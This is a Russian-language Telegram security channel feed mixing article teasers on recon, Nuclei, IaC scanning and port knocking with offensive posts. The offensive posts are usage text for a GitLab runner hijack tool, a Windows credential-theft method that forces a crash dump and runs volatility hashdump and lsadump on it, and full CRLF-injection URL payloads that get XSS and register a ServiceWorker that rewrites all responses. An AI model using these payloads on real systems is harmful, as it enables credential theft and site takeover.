Abusing GitLab Runners
#gitlab #devsecops
Не самая новая техника hijack'а других gitlab runner'ов, но тем не менее эффективная, если вы получаете доступ к gitlab и/или токен раннера. В этой статье автор хотел бы объяснить, что такое Runners, как они работают и как вы можете использовать их во время пентестов.
➡️ Research
➡️ Github PoC
Использование:
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#gitlab #devsecops
Не самая новая техника hijack'а других gitlab runner'ов, но тем не менее эффективная, если вы получаете доступ к gitlab и/или токен раннера. В этой статье автор хотел бы объяснить, что такое Runners, как они работают и как вы можете использовать их во время пентестов.
Использование:
usage: hijack-runner.py [-h] [--target TARGET] [--register REGISTER] [--attack ATTACK] [--tag TAG]
[--clone]
Abuse GitLab Runners
optional arguments:
-h, --help show this help message and exit
--target TARGET The GitLab instance to target
--register REGISTER Register a token
--attack ATTACK Use Runner token to steal data
--tag TAG Taglist separated with commas
--clone Will clone the repo locally
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from DefenseEvasion
This media is not supported in your browser
VIEW IN TELEGRAM
💀 Windows | Get passwords no one notices 🔑
- Run mimikatz to steal passwords? — No way!
- Capture RAM using forensics tools, exfiltrate it and process remotely? — Better, but blue team will knock you down anyway (your user isn't a forensics specialist, huh?)
🥷🏻How to get RAM snapshot quieter
- When Windows faces a problem that it can't recover from safely, it shows BSoD and saves the current RAM state to
- So, be the root cause of BSoD — crash the system
🔑 Get passwords!
1️⃣End critical process (svchost) or start wininit
2️⃣Exfiltrate
3️⃣Launch volatility
⚠️Requirements
- Full memory dump is enabled (CrashDumpEnabled = 0x1, Overwrite = 0x1)
- Rights to access MEMORY.DMP
> Read the full post (more techniques, nuances, detection, hardening)
#redteam #blueteam #credential_access
- Run mimikatz to steal passwords? — No way!
- Capture RAM using forensics tools, exfiltrate it and process remotely? — Better, but blue team will knock you down anyway (your user isn't a forensics specialist, huh?)
🥷🏻How to get RAM snapshot quieter
- When Windows faces a problem that it can't recover from safely, it shows BSoD and saves the current RAM state to
C:\Windows\MEMORY.DMP file- So, be the root cause of BSoD — crash the system
🔑 Get passwords!
1️⃣End critical process (svchost) or start wininit
2️⃣Exfiltrate
C:\WIndows\MEMORY.DMP3️⃣Launch volatility
py vol.py -f MEMORY.DMP windows.cachedump.Cachedump
py vol.py -f MEMORY.DMP windows.hashdump.Hashdump
py vol.py -f MEMORY.DMP windows.lsadump.Lsadump
⚠️Requirements
- Full memory dump is enabled (CrashDumpEnabled = 0x1, Overwrite = 0x1)
- Rights to access MEMORY.DMP
> Read the full post (more techniques, nuances, detection, hardening)
#redteam #blueteam #credential_access
Forwarded from Я у мамы SecMemOps
This media is not supported in your browser
VIEW IN TELEGRAM
А какой сегодня ты?
Forwarded from Telegram
Hello, this is Telegram Support.
bytescare.com made a complaint https://t.me/poxek is infringing on their copyright.
We kindly ask you to contact the copyright holder via email abuse_team@bytescare.com to resolve the matter.
bytescare.com made a complaint https://t.me/poxek is infringing on their copyright.
We kindly ask you to contact the copyright holder via email abuse_team@bytescare.com to resolve the matter.
Увеличиваем Attack Surface на пентесте периметра
#recon #разведка #хабр
Типичная проблема: компании часто сами не подозревают, какие ресурсы у них могут «торчать наружу». А раз их может нарыть потенциальный злоумышленник — это проблема. На пентестах внешнего периметра не всегда сразу доступен полный скоуп IP-адресов, доменов и поддоменов. В таких случаях нам, пентестерам, приходится recon-ить все ресурсы компании. Ну и конечно же, чем больше скоуп, тем больше Attack Surface, тем больше потенциальных файндингов, в итоге — больше вероятность пробива периметра.
❗️ Важный тезис - нет серебряной пули, который сделает разведку универсальной. Когда-нибудь вы наткнетесь на скоуп, который не будет поддаваться wildcard фильтрации или поддоменов пассивно не собирается, активно только брутить и вы в итоге много поддоменов пропустите и это НОРМАЛЬНО. Постройте базу для разведку, но всегда проходитесь руками
➡️ Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#recon #разведка #хабр
Типичная проблема: компании часто сами не подозревают, какие ресурсы у них могут «торчать наружу». А раз их может нарыть потенциальный злоумышленник — это проблема. На пентестах внешнего периметра не всегда сразу доступен полный скоуп IP-адресов, доменов и поддоменов. В таких случаях нам, пентестерам, приходится recon-ить все ресурсы компании. Ну и конечно же, чем больше скоуп, тем больше Attack Surface, тем больше потенциальных файндингов, в итоге — больше вероятность пробива периметра.
Please open Telegram to view this post
VIEW IN TELEGRAM
Удобная подача списка url в shortscan по очереди
#shortscan #IIS #microsoft #заметка
P.S. в целом любую тулзу можно так завернуть, если разработчик не сделал функционал указания файла, как входных данных, а можно и PR ему отправить 😉
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#shortscan #IIS #microsoft #заметка
cat IIS.txt | xargs -I@ sh -c 'shortscan @'
P.S. в целом любую тулзу можно так завернуть, если разработчик не сделал функционал указания файла, как входных данных, а можно и PR ему отправить 😉
Please open Telegram to view this post
VIEW IN TELEGRAM
первая тысяча людей в чате)
Заходите, если не знали о чате ранее. Всегда активные беседы)
🌚 @poxek_chat
Заходите, если не знали о чате ранее. Всегда активные беседы)
Please open Telegram to view this post
VIEW IN TELEGRAM
Nuclei Fu
#nuclei #projectdiscovery #DAST
В сегодняшней статье речь пойдет о Nuclei — это мощный open-source инструмент для поиска уязвимостей (DAST), который активно развивается благодаря поддержке сообщества.
Доклад «Nuclei Fu» был впервые представлен экспертами СайберОК – Станиславом Савченко и Андреем Сикорским – на самой масштабной в Центральной Азии хакерской конференции KazHackStan, проходившей 11-13 сентября.
Посмотреть доклад: здесь
Посмотреть презентацию к докладу: здесь
За последний год в Nuclei было несколько крупных обновлений, которые принесли множество фич, таких как кодовая вставка, использование javascript в шаблонах, управление запросами через flow, внедрение подписи шаблонов и пр. Сегодня хотелось бы рассказать о возможных атаках на Nuclei, а именно о клиентских атаках, которые стали доступны благодаря этим нововведениям.
Далее рассказ буду вести в контексте двух сторон – Алисы, которая хочет защитить свой веб-сервер от сканирования Nuclei, и Боба, который, собственно, и запускает Nuclei.
➡️ Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#nuclei #projectdiscovery #DAST
В сегодняшней статье речь пойдет о Nuclei — это мощный open-source инструмент для поиска уязвимостей (DAST), который активно развивается благодаря поддержке сообщества.
Доклад «Nuclei Fu» был впервые представлен экспертами СайберОК – Станиславом Савченко и Андреем Сикорским – на самой масштабной в Центральной Азии хакерской конференции KazHackStan, проходившей 11-13 сентября.
Посмотреть доклад: здесь
Посмотреть презентацию к докладу: здесь
За последний год в Nuclei было несколько крупных обновлений, которые принесли множество фич, таких как кодовая вставка, использование javascript в шаблонах, управление запросами через flow, внедрение подписи шаблонов и пр. Сегодня хотелось бы рассказать о возможных атаках на Nuclei, а именно о клиентских атаках, которые стали доступны благодаря этим нововведениям.
Далее рассказ буду вести в контексте двух сторон – Алисы, которая хочет защитить свой веб-сервер от сканирования Nuclei, и Боба, который, собственно, и запускает Nuclei.
Please open Telegram to view this post
VIEW IN TELEGRAM
Ключ от всех дверей: как нашли бэкдор в самых надежных* картах доступа
#nfc #rfid #СКУД
Вы прикладываете ключ-карту к считывателю, и дверь офиса открывается. Но что, если такой пропуск может взломать и скопировать любой желающий?
В 2020 году Shanghai Fudan Microelectronics выпустила новые смарт-карты FM11RF08S. Производитель заявил об их полной защищенности от всех известных методов взлома. Группа исследователей проверила эти заявления и обнаружила встроенный бэкдор, позволяющий получить полный доступ к данным карты.
P.S. ребята старались писать статью, обязательно ставьте +rep
➡️ Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#nfc #rfid #СКУД
Вы прикладываете ключ-карту к считывателю, и дверь офиса открывается. Но что, если такой пропуск может взломать и скопировать любой желающий?
В 2020 году Shanghai Fudan Microelectronics выпустила новые смарт-карты FM11RF08S. Производитель заявил об их полной защищенности от всех известных методов взлома. Группа исследователей проверила эти заявления и обнаружила встроенный бэкдор, позволяющий получить полный доступ к данным карты.
P.S. ребята старались писать статью, обязательно ставьте +rep
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from KazDevOps
Разыгрываем 7 ваучеров на бесплатное обучение и сертификацию от The Linux Foundation. Ваучеры дают 100% скидку до 31.10.2025 — и мы хотим ими поделиться:
Их можно применить к любому:
— онлайн-курсу
— сертификационному экзамену
— или пакету (курс + сертификация)
🤝 CKA, CKS, CKAD и другие — в комплекте!
Условия розыгрыша просты:
Go-go-go, и успехов!
#kubernetes #cka #ckad #cks #k8s #linuxfoundation #cncf
@DevOpsKaz
Please open Telegram to view this post
VIEW IN TELEGRAM
#bugbounty #дляначинающих #meme
Эта статья основана на моем опыте веб-хакера, но описанные в ней принципы в целом применимы ко всем дисциплинам хакинга. В основном она предназначена для начинающих хакеров и для людей, которые уже нашли несколько багов, но хотят сделать свой подход к баг-баунти более последовательным и систематичным.
Об авторе: я Киаран (или Monke). Я ирландец, но живу в Эдинбурге. Занимаюсь баг-баунти уже примерно четыре года, участвовал в четырех мероприятиях Live Hacking Event на разных платформах, скоро будет пятое. Я довольно типичный веб-хакер, сейчас мне больше всего нравится заниматься хакингом на стороне клиента. В этом году я наконец полностью перешел на зарабатывание денег при помощи баг-баунти и основал компанию Simian Security. Возможно, я единственный ирландец, для которого баг-баунти является полноценной работой.
Please open Telegram to view this post
VIEW IN TELEGRAM
IaC и DevSecOps: выбираем лучшие инструменты анализа и защиты инфраструктурного кода
#IaC #DevSecOps #appsec #безопаснаяразработка
Сегодня мы вновь будем говорить об особенностях статического сканирования, но на этот раз переключим фокус с программного кода на код инфраструктурный.
Частично этот вопрос обсуждался в статье про безопасность контейнеризированных приложений в DevSecOps. В этой статье будут рассмотрены краткие теоретические сведения о подходе “Инфрастуркутра как кодˮ, место безопасности IaC в цикле DevSecOps, методы статического анализа конфигурационных файлов и ключевые особенности работы с инструментом KICS.
➡️ Читать далее
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#IaC #DevSecOps #appsec #безопаснаяразработка
Сегодня мы вновь будем говорить об особенностях статического сканирования, но на этот раз переключим фокус с программного кода на код инфраструктурный.
Частично этот вопрос обсуждался в статье про безопасность контейнеризированных приложений в DevSecOps. В этой статье будут рассмотрены краткие теоретические сведения о подходе “Инфрастуркутра как кодˮ, место безопасности IaC в цикле DevSecOps, методы статического анализа конфигурационных файлов и ключевые особенности работы с инструментом KICS.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from BlackFan
Ну и раз я вспомнил что у меня есть Telegram канал - нужно запостить что-то полезное)
Если вы обнаружили CRLF Injection, которая позволяет перезаписать HTTP ответ и сделать XSS, - то ее импакт можно увеличить с помощью ServiceWorker.
Для регистрации ServiceWorker необходимо:
1) Иметь возможность выполнения JavaScript в контексте сайта
2) Наличие JavaScript файла на сервере с корректным Content-Type
Используя CRLF Injection оба этих условия легко выполняются:
XSS
JS файл
Но остается проблема, что запросы, которые контролируются ServiceWorker, будут ограничены его scope.
То есть папкой, в которой у нас сработала CRLF Injection. В данном случае это /some/path/foo/bar/, что не очень интересно.
Но если почитать документацию, то можно узнать о заголовке Service-Worker-Allowed, который устанавливается в HTTP ответе вместе с JS кодом воркера, и через который можно переопределить scope.
Что в случае с CRLF Injection позволяет зарегистрировать ServiceWorker, расположенный в любой папке, на корень сайта.
Для этого формируем код ServiceWorker с
И подключаем его через XSS.
Также иногда бывает, что не получается сформировать валидный JS ограничивая HTTP ответ по длине с помощью Content-Length. В таком случае можно отбросить лишнее в ответе с помощью формирования HTTP ответа с Transfer-Encoding:chunked.
Если вы обнаружили CRLF Injection, которая позволяет перезаписать HTTP ответ и сделать XSS, - то ее импакт можно увеличить с помощью ServiceWorker.
Для регистрации ServiceWorker необходимо:
1) Иметь возможность выполнения JavaScript в контексте сайта
2) Наличие JavaScript файла на сервере с корректным Content-Type
Используя CRLF Injection оба этих условия легко выполняются:
XSS
https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/html%0D%0AContent-Length:20%0D%0A%0D%0A<script>XSS</script>
JS файл
https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/javascript%0D%0AContent-Length:7%0D%0A%0D%0AJS_file
Но остается проблема, что запросы, которые контролируются ServiceWorker, будут ограничены его scope.
То есть папкой, в которой у нас сработала CRLF Injection. В данном случае это /some/path/foo/bar/, что не очень интересно.
Но если почитать документацию, то можно узнать о заголовке Service-Worker-Allowed, который устанавливается в HTTP ответе вместе с JS кодом воркера, и через который можно переопределить scope.
Что в случае с CRLF Injection позволяет зарегистрировать ServiceWorker, расположенный в любой папке, на корень сайта.
Для этого формируем код ServiceWorker с
Service-Worker-Allowed:/, который подменяет все HTTP ответы на строку Fake response.https://example.tld/some/path/foo/bar/?param=x%0D%0AService-Worker-Allowed:/%0D%0AContent-Type:text/javascript%0D%0AContent-Length:162%0D%0A%0D%0Aself.addEventListener(%22fetch%22,function(event){event.respondWith(new%20Response(%22Fake%20response%22,{status:200,statusText:%22OK%22,headers:{%22Content-Type%22:%22text/html%22}}))})И подключаем его через XSS.
https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/html%0D%0AContent-Length:378%0D%0A%0D%0A%3Cscript%3Enavigator.serviceWorker.register('/some/path/foo/bar/?param=x%250D%250AService-Worker-Allowed:/%250D%250AContent-Type:text/javascript%250D%250AContent-Length:162%250D%250A%250D%250Aself.addEventListener(%2522fetch%2522,function(event){event.respondWith(new%2520Response(%2522Fake%2520response%2522,{status:200,statusText:%2522OK%2522,headers:{%2522Content-Type%2522:%2522text/html%2522}}))})',{scope:'/'})%3C/script%3EТакже иногда бывает, что не получается сформировать валидный JS ограничивая HTTP ответ по длине с помощью Content-Length. В таком случае можно отбросить лишнее в ответе с помощью формирования HTTP ответа с Transfer-Encoding:chunked.
https://example.tld/some/path/foo/bar/?param=x%0D%0AContent-Type:text/javascript%0D%0ATransfer-Encoding:chunked%0D%0A%0D%0A7%0D%0AJS_file%0D%0A0%0D%0A%0D%0A
#k8s #kubernetes #контейнеры #container
Kubernetes сейчас массово используют в ЦОДах и облачных решениях. Какие заслуги у Кубера, что было до него и почему сейчас он едва ли не стандарт отрасли. А ещё, как понять, что Кубер вам ни к чему.
Сначала пятиминутка истории: как мы жили до появления Kubernetes. Когда-то серверные инфраструктуры основывались на концепции Bare Metal — физическом оборудовании, на котором выполнялись приложения. Такая архитектура позволяла чётко контролировать вычислительные ресурсы: количество ядер CPU, объём оперативной памяти и другие параметры можно было определять и наращивать напрямую, делая аппаратные апгрейды. Закон Мура работал на руку: рост производительности позволял постоянно повышать мощность без значительных затрат. При необходимости можно было создать настоящий кластер, объединяя серверы для эффективного распределения нагрузки и улучшенной работы с пользовательскими запросами.
Please open Telegram to view this post
VIEW IN TELEGRAM
Практические варианты использования port knocking
#харденинг #ssh #ACL #fail2ban #администрирование
Существуют различные варианты попыток защиты\сокрытия сервисов от "любопытных глаз". Основные: использование нестандартного порта, fail2ban, ACL и tarpit (и их сочетание).
Есть ещё port knocking: как дополнительный фактор защиты - может снизить обнаружение сервиса, а не пытаться бороться с последствиями (брутфорс, эксплуатация), когда сервис уже обнаружен. Но, очень часто эта технология оказывается не используемой. Где-то из-за незнания технологии (хотя, статей хватает). Но, чаще из-за проблем на практике, которые мешают её внедрению:
➡️ Читать тута
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#харденинг #ssh #ACL #fail2ban #администрирование
Существуют различные варианты попыток защиты\сокрытия сервисов от "любопытных глаз". Основные: использование нестандартного порта, fail2ban, ACL и tarpit (и их сочетание).
Есть ещё port knocking: как дополнительный фактор защиты - может снизить обнаружение сервиса, а не пытаться бороться с последствиями (брутфорс, эксплуатация), когда сервис уже обнаружен. Но, очень часто эта технология оказывается не используемой. Где-то из-за незнания технологии (хотя, статей хватает). Но, чаще из-за проблем на практике, которые мешают её внедрению:
Please open Telegram to view this post
VIEW IN TELEGRAM